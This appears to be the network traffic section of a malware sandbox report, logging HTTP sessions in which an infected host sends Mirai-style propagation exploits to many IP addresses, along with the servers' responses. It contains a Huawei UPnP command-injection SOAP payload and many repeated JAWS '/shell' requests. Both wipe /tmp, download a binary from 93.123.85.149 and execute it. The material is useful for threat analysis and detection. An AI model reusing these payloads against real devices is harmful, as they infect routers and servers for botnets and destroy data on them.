                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:33:00.634989977 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            573192.168.2.2345072198.46.203.3980
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:47.575690031 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:47.694740057 CET413INHTTP/1.0 407 Proxy Authentication Required
                                                            Proxy-Authenticate: Basic realm="login"
                                                            Connection: close
                                                            Content-type: text/html; charset=utf-8
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 37 20 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 34 30 37 20 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 68 32 3e 3c 68 33 3e 41 63 63 65 73 73 20 74 6f 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 64 69 73 61 6c 6c 6f 77 65 64 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 6f 72 20 79 6f 75 20 6e 65 65 64 20 76 61 6c 69 64 20 75 73 65 72 6e 61 6d 65 2f 70 61 73 73 77 6f 72 64 20 74 6f 20 75 73 65 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>407 Proxy Authentication Required</title></head><body><h2>407 Proxy Authentication Required</h2><h3>Access to requested resource disallowed by administrator or you need valid username/password to use this resource</h3></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            574192.168.2.2351508172.121.187.15180
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:47.613814116 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:47.771714926 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:32:22 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            575192.168.2.2358508178.128.201.21980
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:47.668262959 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:47.880361080 CET498INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:32:47 GMT
                                                            Server: Apache/2.4.29 (Ubuntu)
                                                            Content-Length: 304
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 64 72 6f 6e 65 2d 35 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.29 (Ubuntu) Server at drone-51.com Port 80</address></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            576192.168.2.234948687.99.180.17080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:47.668428898 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:47.880374908 CET327INHTTP/1.0 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 08:27:21 GMT
                                                            Server: Boa/0.94.14rc21
                                                            Accept-Ranges: bytes
                                                            Connection: close
                                                            Content-Type: text/html; charset=ISO-8859-1
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            577192.168.2.2358482151.205.173.3280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:47.726110935 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:47.853915930 CET443INHTTP/1.1 301 Moved Permanently
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:32:47 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 162
                                                            Connection: keep-alive
                                                            Keep-Alive: timeout=5
                                                            Location: https://127.0.0.1/shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            578192.168.2.233430849.4.64.19580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:47.774923086 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:48.093080044 CET490INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/html; charset=us-ascii
                                                            Server: Microsoft-HTTPAPI/2.0
                                                            Date: Fri, 26 Jan 2024 14:32:47 GMT
                                                            Connection: close
                                                            Content-Length: 311
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            579192.168.2.2332854196.51.15.16080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:47.842051029 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:48.021130085 CET1286INHTTP/1.1 400 Bad Request
                                                            Server: squid/3.5.20
                                                            Mime-Version: 1.0
                                                            Date: Fri, 26 Jan 2024 14:43:32 GMT
                                                            Content-Type: text/html;charset=utf-8
                                                            Content-Length: 3536
                                                            X-Squid-Error: ERR_INVALID_URL 0
                                                            Connection: close
                                                            Data Raw: 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 2f 73 71 75 69 64 2d 69 6e 74 65 72 6e 61 6c 2d 73 74 61 74 69 63 2f 69 63 6f 6e 73 2f 53 4e 2e 70 6e 67 27 29 20
                                                            Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2016 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2016 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('/squid-internal-static/icons/SN.png')
                                                            Jan 26, 2024 15:32:48.021145105 CET1286INData Raw: 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20
                                                            Data Ascii: no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#titles ftpsuccess {background-color:#00ff00;width:100%;}/* Page displayed body content
                                                            Jan 26, 2024 15:32:48.021157026 CET1220INData Raw: 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 32 3e 0a 3c 2f 64 69 76 3e 0a 3c 68 72 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 54 68 65 20 66 6f 6c 6c 6f 77
                                                            Data Ascii: sted URL could not be retrieved</h2></div><hr><div id="content"><p>The following error was encountered while trying to retrieve the URL: <a href="/shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws">/shell?cd+/tmp;rm+-rf+*;wget+


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            580192.168.2.2340702212.183.29.5380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:47.917861938 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:48.140830994 CET66INHTTP/1.1 400 Bad Request
                                                            Connection: close
                                                            Content-Length: 0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            581192.168.2.234967488.221.30.22780
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:47.925101995 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:48.155194044 CET431INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 209
                                                            Expires: Fri, 26 Jan 2024 14:32:48 GMT
                                                            Date: Fri, 26 Jan 2024 14:32:48 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 62 33 35 30 38 63 34 66 26 23 34 36 3b 31 37 30 36 32 37 39 35 36 38 26 23 34 36 3b 31 66 36 62 35 37 62 61 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;b3508c4f&#46;1706279568&#46;1f6b57ba</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            582192.168.2.234529889.161.183.3280
                                                            TimestampBytes transferredDirectionData
